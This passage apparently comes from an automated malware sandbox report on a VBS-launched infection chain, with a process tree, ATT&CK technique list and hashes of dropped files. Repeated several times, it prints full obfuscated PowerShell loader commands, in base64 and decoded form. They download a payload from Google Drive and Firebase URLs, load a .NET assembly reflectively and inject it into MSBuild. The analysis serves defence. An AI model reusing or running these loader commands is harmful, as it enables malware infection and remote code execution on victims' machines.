SW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:3516
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4236

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:4888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5320
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:3608
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:440

C:\Windows\system32\wscript.exe
wscript.exe C:\ProgramData\carvoejar.vbs
1⤵
- Checks computer location settings
PID:1012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgncnRraW1hZ2VVcmwgPSA0VjNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdScrJ2M/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVYnKydnSkonKydKdjFGNnZTNHNVJysnT3libkgtc0R2VWhCWXd1cjRWMztydGt3ZWJDbGllbnQgPSBOZXctJysnT2JqZWN0IFMnKyd5c3RlbS5OZXQuV2ViQ2xpZW50O3J0a2ltYWdlQnl0ZXMgPSBydGt3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXQnKydhKHJ0a2ltYWdlVXJsKTtydGtpbWFnZVRleHQgPSBbU3lzJysndGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhydGtpbWFnZUJ5dGVzKTtydGtzdGFyJysndEZsYWcgPSA0VjM8PCcrJ0JBU0U2NF9TVEFSVD4+NFYzO3J0a2VuZEZsYWcgPSA0VjM8PEJBU0U2NF9FTkQ+PjRWMztydGtzdGFydEknKyduZGV4ID0gcnRrJysnaW1hZ2VUZXh0LkluZGV4T2YocnRrc3RhcnRGbGFnKTtydGtlbmRJbmRleCA9IHJ0a2ltYWdlVGV4dC5JbmRleE9mKHJ0a2UnKyduZEZsYWcpO3J0a3N0YScrJ3J0SW5kJysnZXggLWdlIDAgLWFuZCBydGtlbmRJbmRleCAtZ3QgcnRrc3RhcnRJbmRleDtydGtzJysndGFydEluZGV4ICs9IHJ0a3N0YXJ0RmxhJysnZy5MZW5ndGg7cnRrYmFzZTY0TGVuZ3RoID0gcnRrZW5kSW5kZXggLSBydGtzdGFydEluZGV4O3J0a2Jhc2U2NENvbW1hbmQgPSBydGtpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ3J0a3N0YXJ0SW5kZXgsIHJ0a2Jhc2U2NExlbmd0aCcrJyk7cnRrYmFzJysnZTY0UmV2ZXJzZWQgPSAtam9pbiAocnRrJysnYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFJCViAnKydGJysnb3JFYWNoLU9iamVjdCB7IHJ0a18gfSlbLTEuLi0ocnRrYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtydGtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKHInKyd0a2Jhc2U2NFJldmVyc2VkKTtydGtsb2FkZScrJ2RBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5BJysnc3NlbWJseV06OkxvJysnYWQocnRrY29tbWFuZEJ5dGVzKTtydGt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDRWM1ZBSTRWMyk7cnRrdmFpTWV0aG9kLkludm9rZShydGtudWxsLCAnKydAKDRWMzcyNWVhY2JkNTFmMScrJy0wNjliLTA2NTQtYTlhNC1hM2Y4MjFjMD1uZWtvdCZhaWRlbT10bGE/dHh0LlRJVFNFVC9vL21vYy50b3BzcHBhLmIxMGFlLW9pbS1vdGNlJysneW9ycC9iLzB2L21vYy5zaXBhZWxnb29nLmVnYXJvdHNlc2FiZXJpZi8vOnNwdHRoNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VicrJzNkZXNhdCcrJ2l2YWRvNFYzLCA0VjNkZXNhdGl2YWRvNFYzLCA0VjNNU0J1aWxkNFYzJysnLCA0VjNkZXNhdGl2YWQnKydvNFYzLDRWM2Rlc2F0aXZhZG80VjMsNFYnKyczZGVzYXRpdmFkJysnbzRWMyw0VicrJzNVUkw0VjMsIDRWM0M6Ym0nKydXUHJvZ3JhbURhdGFiJysnbVc0VjMsNFYzY2Fydm9lamFyNFYzLDRWM3ZiczRWMyw0JysnVjMxNFYzLDRWMzE0VjMpKTsnKS1jUmVwTEFjRSAgJ3J0aycsW0NIYXJdMzYgIC1SZVBMQUNFKFtDSGFyXTgyK1tDSGFyXTY2K1tDSGFyXTg2KSxbQ0hhcl0xMjQgLVJlUExBQ0UgKFtDSGFyXTUyK1tDSGFyXTg2K1tDSGFyXTUxKSxbQ0hhcl0zOS1jUmVwTEFjRSAgKFtDSGFyXTk4K1tDSGFyXTEwOStbQ0hhcl04NyksW0NIYXJdOTIpIHwgJiAoIChbc1RSSW5HXSR2ZXJCT1NFUFJFRmVyRW5jZSlbMSwzXSsneCctam9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('rtkimageUrl = 4V3https://drive.google.com/u'+'c?export=download&id=1AIV'+'gJJ'+'Jv1F6vS4sU'+'OybnH-sDvUhBYwur4V3;rtkwebClient = New-'+'Object S'+'ystem.Net.WebClient;rtkimageBytes = rtkwebClient.Do'+'wnloadDat'+'a(rtkimageUrl);rtkimageText = [Sys'+'tem.Text.Encoding]::UTF8.GetString(rtkimageBytes);rtkstar'+'tFlag = 4V3<<'+'BASE64_START>>4V3;rtkendFlag = 4V3<<BASE64_END>>4V3;rtkstartI'+'ndex = rtk'+'imageText.IndexOf(rtkstartFlag);rtkendIndex = rtkimageText.IndexOf(rtke'+'ndFlag);rtksta'+'rtInd'+'ex -ge 0 -and rtkendIndex -gt rtkstartIndex;rtks'+'tartIndex += rtkstartFla'+'g.Length;rtkbase64Length = rtkendIndex - rtkstartIndex;rtkbase64Command = rtkimageText.Substring('+'rtkstartIndex, rtkbase64Length'+');rtkbas'+'e64Reversed = -join (rtk'+'base64Command.ToCharArray() RBV '+'F'+'orEach-Object { rtk_ })[-1..-(rtkbase64Command.Length)];rtkcommandBytes = [System.Convert]::FromBase64String(r'+'tkbase64Reversed);rtkloade'+'dAssembly = [System.Reflection.A'+'ssembly]::Lo'+'ad(rtkcommandBytes);rtkvaiMethod = [dnlib.IO.Home].GetMethod(4V3VAI4V3);rtkvaiMethod.Invoke(rtknull, '+'@(4V3725eacbd51f1'+'-069b-0654-a9a4-a3f821c0=nekot&aidem=tla?txt.TITSET/o/moc.topsppa.b10ae-oim-otce'+'yorp/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth4V3, 4V3desativado4V3, 4V'+'3desat'+'ivado4V3, 4V3desativado4V3, 4V3MSBuild4V3'+', 4V3desativad'+'o4V3,4V3desativado4V3,4V'+'3desativad'+'o4V3,4V'+'3URL4V3, 4V3C:bm'+'WProgramDatab'+'mW4V3,4V3carvoejar4V3,4V3vbs4V3,4'+'V314V3,4V314V3));')-cRepLAcE 'rtk',[CHar]36 -RePLACE([CHar]82+[CHar]66+[CHar]86),[CHar]124 -RePLACE ([CHar]52+[CHar]86+[CHar]51),[CHar]39-cRepLAcE ([CHar]98+[CHar]109+[CHar]87),[CHar]92) | & ( ([sTRInG]$verBOSEPREFerEnce)[1,3]+'x'-joiN'')"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\GenuineTicket

Filesize
1KB

MD5
67a8abe602fd21c5683962fa75f8c9fd

SHA1
e296942da1d2b56452e05ae7f753cd176d488ea8

SHA256
1d19fed36f7d678ae2b2254a5eef240e6b6b9630e5696d0f9efb8b744c60e411

SHA512
70b0b27a2b89f5f771467ac24e92b6cc927f3fdc10d8cb381528b2e08f2a5a3e8c25183f20233b44b71b54ce910349c279013c6a404a1a95b3cc6b8922ab9fc6

Download Submit
C:\ProgramData\carvoejar.vbs

Filesize
68KB

MD5
722ef0f62d5f0d96f0f63888e0d8ae39

SHA1
0afc5ebc973e07bc01682922e5972dbfead09691

SHA256
b2bea3384dc24126675379eb1473946f2927a10d8eff6730bc024716ef0f6864

SHA512
9e614dbf3ea73992903a5a93884733ce4346e9108a78fba4f0ded8200cfd0fc33a929cebf2a1236163e63e6e33ac0b0daf8af8e881bb125f9cd57986db5454b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ba6ef346187b40694d493da98d5da979

SHA1
643c15bec043f8673943885199bb06cd1652ee37

SHA256
d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

SHA512
2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b8880802fc2bb880a7a869faa01315b0

SHA1
51d1a3fa2c272f094515675d82150bfce08ee8d3

SHA256
467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

SHA512
e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
19KB

MD5
2227a244ca78dc817e80e78e42e231d7

SHA1
56caeba318e983c74838795fb3c4d9ac0fb4b336

SHA256
e9d7b93bae57eebd7019ac0f5f82bac734b7ac3534d1fa9bdba6b1fc2f093a24

SHA512
624cc23d4a18185ae96941cf8a35d342e048476b0384f0595ec1f273e19163ca49b17b14760628eb9da9a5f5519d4671544669fb08985c4945faf663faf92e12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
62KB

MD5
c3c0eb5e044497577bec91b5970f6d30

SHA1
d833f81cf21f68d43ba64a6c28892945adc317a6

SHA256
eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb

SHA512
83d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
67KB

MD5
fb2f02c107cee2b4f2286d528d23b94e

SHA1
d76d6b684b7cfbe340e61734a7c197cc672b1af3

SHA256
925dd883d5a2eb44cf1f75e8d71346b98f14c4412a0ea0c350672384a0e83e7a

SHA512
be51d371b79f4cc1f860706207d5978d18660bf1dc0ca6706d43ca0375843ec924aa4a8ed44867661a77e3ec85e278c559ab6f6946cba4f43daf3854b838bb82

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
19KB

MD5
76a3f1e9a452564e0f8dce6c0ee111e8

SHA1
11c3d925cbc1a52d53584fd8606f8f713aa59114

SHA256
381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

SHA512
a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
63KB

MD5
710d7637cc7e21b62fd3efe6aba1fd27

SHA1
8645d6b137064c7b38e10c736724e17787db6cf3

SHA256
c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

SHA512
19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
26KB

MD5
a3c76b7b4a1fe97d3ff98bc059443f8b

SHA1
b1e0b7766d8f78431eead5c33a19c2219e089e08

SHA256
1df90a0e6371144dc93194301cad1c95875e1fe7173fcb23d644c180c9a97c12

SHA512
8369cea1da2990f61a6ffdf8067447470b4689e24aafec0d7de5a67e8e94b538fce0ae91a41459e41c5323b887da9dd50710f436d8cbde4102a30c37de1f8f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
53KB

MD5
68f0a51fa86985999964ee43de12cdd5

SHA1
bbfc7666be00c560b7394fa0b82b864237a99d8c

SHA256
f230c691e1525fac0191e2f4a1db36046306eb7d19808b7bf8227b7ed75e5a0f

SHA512
3049b9bd4160bfa702f2e2b6c1714c960d2c422e3481d3b6dd7006e65aa5075eed1dc9b8a2337e0501e9a7780a38718d298b2415cf30ec9e115a9360df5fa2a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
40KB

MD5
3051c1e179d84292d3f84a1a0a112c80

SHA1
c11a63236373abfe574f2935a0e7024688b71ccb

SHA256
992cbdc768319cbd64c1ec740134deccbb990d29d7dccd5ecd5c49672fa98ea3

SHA512
df64e0f8c59b50bcffb523b6eab8fabf5f0c5c3d1abbfc6aa4831b4f6ce008320c66121dcedd124533867a9d5de83c424c5e9390bf0a95c8e641af6de74dabff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
27KB

MD5
cacfb74b6db8ec937cadbd7a4e239694

SHA1
059f1501f9536c549448169c293d0fa1e3d00031

SHA256
3c21c8fd28579bd102c6d48522db328a689c5c8c6048453bb736a1f0d27567cc

SHA512
4765d09795339da2afcd22f305b9c595921b6071f8766bfc0285ab6e8e1589a0c262bd86f20caed7258bc2fedfe6e81a1f649dfe25bbaa75569340c8c7ba0c1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
65KB

MD5
8b395bb621703724bc7300b8d3e201c3

SHA1
505bddb7e15f9111b5109ea023719fe96ac37100

SHA256
c6dff07157ec058639c999dc7f6ddb1afc33f43bfb88756195c402b87ac45d83

SHA512
f9875d3d3969f290c7cd39ff9a0d1db3f0072a490fd1c104b02efa09aa387cd6f739ec1ed07f4dd2983c710f604f2427fc02752876378a0365c489e2281ee356

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
85KB

MD5
8fd164460b4177821c9136e136df1535

